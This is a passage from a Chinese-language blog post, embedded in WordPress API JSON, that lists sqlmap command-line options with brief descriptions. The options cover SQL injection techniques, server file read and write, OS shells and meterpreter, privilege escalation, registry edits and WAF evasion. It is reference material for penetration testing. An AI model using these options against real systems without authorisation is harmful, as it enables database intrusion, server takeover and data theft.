id=\"detection\u68c0\u6d4b\uff09\">Detection\uff08\u68c0\u6d4b\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u6765\u6307\u5b9a\u5728SQL\u76f2\u6ce8\u65f6\u5982\u4f55\u89e3\u6790\u548c\u6bd4\u8f83HTTP\u54cd\u5e94\u9875\u9762\u7684\u5185\u5bb9\u3002<\/p>\n<ul>\n<li>\u2013level=LEVEL \u6267\u884c\u6d4b\u8bd5\u7684\u7b49\u7ea7\uff081-5\uff0c\u9ed8\u8ba4\u4e3a1\uff09<\/li>\n<li>\u2013risk=RISK \u6267\u884c\u6d4b\u8bd5\u7684\u98ce\u9669\uff080-3\uff0c\u9ed8\u8ba4\u4e3a1\uff09<\/li>\n<li>\u2013string=STRING \u67e5\u8be2\u65f6\u6709\u6548\u65f6\u5728\u9875\u9762\u5339\u914d\u5b57\u7b26\u4e32<\/li>\n<li>\u2013regexp=REGEXP \u67e5\u8be2\u65f6\u6709\u6548\u65f6\u5728\u9875\u9762\u5339\u914d\u6b63\u5219\u8868\u8fbe\u5f0f<\/li>\n<li>\u2013text-only \u4ec5\u57fa\u4e8e\u5728\u6587\u672c\u5185\u5bb9\u6bd4\u8f83\u7f51\u9875<\/li>\n<\/ul>\n<h3 id=\"techniques\u6280\u5de7\uff09\">Techniques\uff08\u6280\u5de7\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u7528\u4e8e\u8c03\u6574\u5177\u4f53\u7684SQL\u6ce8\u5165\u6d4b\u8bd5\u3002<\/p>\n<ul>\n<li>\u2013technique=TECH SQL\u6ce8\u5165\u6280\u672f\u6d4b\u8bd5\uff08\u9ed8\u8ba4BEUST\uff09<\/li>\n<li>\u2013time-sec=TIMESEC DBMS\u54cd\u5e94\u7684\u5ef6\u8fdf\u65f6\u95f4\uff08\u9ed8\u8ba4\u4e3a5\u79d2\uff09<\/li>\n<li>\u2013union-cols=UCOLS \u5b9a\u5217\u8303\u56f4\u7528\u4e8e\u6d4b\u8bd5UNION\u67e5\u8be2\u6ce8\u5165<\/li>\n<li>\u2013union-char=UCHAR \u7528\u4e8e\u66b4\u529b\u731c\u89e3\u5217\u6570\u7684\u5b57\u7b26<\/li>\n<\/ul>\n<h3 id=\"fingerprint\u6307\u7eb9\uff09\">Fingerprint\uff08\u6307\u7eb9\uff09\uff1a<\/h3>\n<ul>\n<li>-f, \u2013fingerprint \u6267\u884c\u68c0\u67e5\u5e7f\u6cdb\u7684DBMS\u7248\u672c\u6307\u7eb9<\/li>\n<\/ul>\n<h3 id=\"brute-force\u86ee\u529b\uff09\">Brute force\uff08\u86ee\u529b\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u88ab\u7528\u6765\u8fd0\u884c\u86ee\u529b\u68c0\u67e5\u3002<\/p>\n<ul>\n<li>\u2013common-tables \u68c0\u67e5\u5b58\u5728\u5171\u540c\u8868<\/li>\n<li>\u2013common-columns \u68c0\u67e5\u5b58\u5728\u5171\u540c\u5217<\/li>\n<\/ul>\n<p>User-defined function injection\uff08\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165\uff09\uff1a<br \/>\n\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u6765\u521b\u5efa\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u3002<\/p>\n<p>\u2013udf-inject \u6ce8\u5165\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570<br \/>\n\u2013shared-lib=SHLIB \u5171\u4eab\u5e93\u7684\u672c\u5730\u8def\u5f84<\/p>\n<h3 id=\"file-system-access\u8bbf\u95ee\u6587\u4ef6\u7cfb\u7edf\uff09\">File system access\uff08\u8bbf\u95ee\u6587\u4ef6\u7cfb\u7edf\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u88ab\u7528\u6765\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf\u3002<\/p>\n<ul>\n<li>\u2013file-read=RFILE \u4ece\u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6587\u4ef6\u7cfb\u7edf\u8bfb\u53d6\u6587\u4ef6<\/li>\n<li>\u2013file-write=WFILE \u7f16\u8f91\u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6587\u4ef6\u7cfb\u7edf\u4e0a\u7684\u672c\u5730\u6587\u4ef6<\/li>\n<li>\u2013file-dest=DFILE \u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u5199\u5165\u6587\u4ef6\u7684\u7edd\u5bf9\u8def\u5f84<\/li>\n<\/ul>\n<h3 id=\"operating-system-access\u64cd\u4f5c\u7cfb\u7edf\u8bbf\u95ee\uff09\">Operating system access\uff08\u64cd\u4f5c\u7cfb\u7edf\u8bbf\u95ee\uff09\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u64cd\u4f5c\u7cfb\u7edf\u3002<\/p>\n<ul>\n<li>\u2013os-cmd=OSCMD \u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/li>\n<li>\u2013os-shell \u4ea4\u4e92\u5f0f\u7684\u64cd\u4f5c\u7cfb\u7edf\u7684shell<\/li>\n<li>\u2013os-pwn \u83b7\u53d6\u4e00\u4e2aOOB shell\uff0cmeterpreter\u6216VNC<\/li>\n<li>\u2013os-smbrelay \u4e00\u952e\u83b7\u53d6\u4e00\u4e2aOOB shell\uff0cmeterpreter\u6216VNC<\/li>\n<li>\u2013os-bof \u5b58\u50a8\u8fc7\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u5229\u7528<\/li>\n<li>\u2013priv-esc \u6570\u636e\u5e93\u8fdb\u7a0b\u7528\u6237\u6743\u9650\u63d0\u5347<\/li>\n<li>\u2013msf-path=MSFPATH Metasploit Framework\u672c\u5730\u7684\u5b89\u88c5\u8def\u5f84<\/li>\n<li>\u2013tmp-path=TMPPATH \u8fdc\u7a0b\u4e34\u65f6\u6587\u4ef6\u76ee\u5f55\u7684\u7edd\u5bf9\u8def\u5f84<\/li>\n<\/ul>\n<h3 id=\"windows\u6ce8\u518c\u8868\u8bbf\u95ee\">Windows\u6ce8\u518c\u8868\u8bbf\u95ee\uff1a<\/h3>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u88ab\u7528\u6765\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edfWindows\u6ce8\u518c\u8868\u3002<\/p>\n<ul>\n<li>\u2013reg-read \u8bfb\u4e00\u4e2aWindows\u6ce8\u518c\u8868\u9879\u503c<\/li>\n<li>\u2013reg-add \u5199\u4e00\u4e2aWindows\u6ce8\u518c\u8868\u9879\u503c\u6570\u636e<\/li>\n<li>\u2013reg-del \u5220\u9664Windows\u6ce8\u518c\u8868\u952e\u503c<\/li>\n<li>\u2013reg-key=REGKEY Windows\u6ce8\u518c\u8868\u952e<\/li>\n<li>\u2013reg-value=REGVAL Windows\u6ce8\u518c\u8868\u9879\u503c<\/li>\n<li>\u2013reg-data=REGDATA Windows\u6ce8\u518c\u8868\u952e\u503c\u6570\u636e<\/li>\n<li>\u2013reg-type=REGTYPE Windows\u6ce8\u518c\u8868\u9879\u503c\u7c7b\u578b<\/li>\n<\/ul>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u6765\u8bbe\u7f6e\u4e00\u4e9b\u4e00\u822c\u7684\u5de5\u4f5c\u53c2\u6570\u3002<\/p>\n<ul>\n<li>-t TRAFFICFILE \u8bb0\u5f55\u6240\u6709HTTP\u6d41\u91cf\u5230\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\u4e2d<\/li>\n<li>-s SESSIONFILE \u4fdd\u5b58\u548c\u6062\u590d\u68c0\u7d22\u4f1a\u8bdd\u6587\u4ef6\u7684\u6240\u6709\u6570\u636e<\/li>\n<li>\u2013flush-session \u5237\u65b0\u5f53\u524d\u76ee\u6807\u7684\u4f1a\u8bdd\u6587\u4ef6<\/li>\n<li>\u2013fresh-queries \u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c<\/li>\n<li>\u2013eta \u663e\u793a\u6bcf\u4e2a\u8f93\u51fa\u7684\u9884\u8ba1\u5230\u8fbe\u65f6\u95f4<\/li>\n<li>\u2013update \u66f4\u65b0SqlMap<\/li>\n<li>\u2013save file\u4fdd\u5b58\u9009\u9879\u5230INI\u914d\u7f6e\u6587\u4ef6<\/li>\n<li>\u2013batch \u4ece\u4e0d\u8be2\u95ee\u7528\u6237\u8f93\u5165\uff0c\u4f7f\u7528\u6240\u6709\u9ed8\u8ba4\u914d\u7f6e\u3002<\/li>\n<\/ul>\n<h3 id=\"miscellaneous\u6742\u9879\uff09\">Miscellaneous\uff08\u6742\u9879\uff09\uff1a<\/h3>\n<ul>\n<li>\u2013beep \u53d1\u73b0SQL\u6ce8\u5165\u65f6\u63d0\u9192<\/li>\n<li>\u2013check-payload IDS\u5bf9\u6ce8\u5165payloads\u7684\u68c0\u6d4b\u6d4b\u8bd5<\/li>\n<li>\u2013cleanup SqlMap\u5177\u4f53\u7684UDF\u548c\u8868\u6e05\u7406DBMS<\/li>\n<li>\u2013forms \u5bf9\u76ee\u6807URL\u7684\u89e3\u6790\u548c\u6d4b\u8bd5\u5f62\u5f0f<\/li>\n<li>\u2013gpage=GOOGLEPAGE \u4ece\u6307\u5b9a\u7684\u9875\u7801\u4f7f\u7528\u8c37\u6b4cdork\u7ed3\u679c<\/li>\n<li>\u2013page-rank Google dork\u7ed3\u679c\u663e\u793a\u7f51\u9875\u6392\u540d\uff08PR\uff09<\/li>\n<li>\u2013parse-errors \u4ece\u54cd\u5e94\u9875\u9762\u89e3\u6790\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u9519\u8bef\u6d88\u606f<\/li>\n<li>\u2013replicate \u590d\u5236\u8f6c\u50a8\u7684\u6570\u636e\u5230\u4e00\u4e2asqlite3\u6570\u636e\u5e93<\/li>\n<li>\u2013tor \u4f7f\u7528\u9ed8\u8ba4\u7684Tor\uff08Vidalia\/ Privoxy\/ Polipo\uff09\u4ee3\u7406\u5730\u5740<\/li>\n<li>\u2013wizard \u7ed9\u521d\u7ea7\u7528\u6237\u7684\u7b80\u5355\u5411\u5bfc\u754c\u9762<\/li>\n<li>–identify-waf sqlmap\u53ef\u4ee5\u5c1d\u8bd5\u627e\u51faWAF\/IPS\/IDS\u4fdd\u62a4\uff0c\u65b9\u4fbf\u7528\u6237\u505a\u51fa\u7ed5\u8fc7\u65b9\u5f0f\u3002\u76ee\u524d\u5927\u7ea6\u652f\u630130\u79cd\u4ea7\u54c1\u7684\u8bc6\u522b\u3002<\/li>\n<li>–check-waf WAF\/IPS\/IDS\u4fdd\u62a4\u53ef\u80fd\u4f1a\u5bf9sqlmap\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270\uff0c\u5982\u679c\u6000\u7591\u76ee\u6807\u6709\u6b64\u9632\u62a4\u7684\u8bdd\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u6765\u6d4b\u8bd5\u3002sqlmap\u5c06\u4f1a\u4f7f\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u53c2\u6570\u6765\u6ce8\u5165\u6d4b\u8bd5<\/li>\n<\/ul>\n<p> <\/p>\n","protected":false},"excerpt":{"rendered":"<p>SQLMAP sqlmap\u7b80\u4ecb sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a 1\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-101","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/101","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=101"}],"version-history":[{"count":1,"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/101\/revisions"}],"predecessor-version":[{"id":102,"href":"https:\/\/daishen.ltd\/index.php?rest_route=\/wp\/v2\/posts\/101\/revisions\/102"}],"wp:attachment":[{"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=101"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=101"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/daishen.ltd\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=101"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}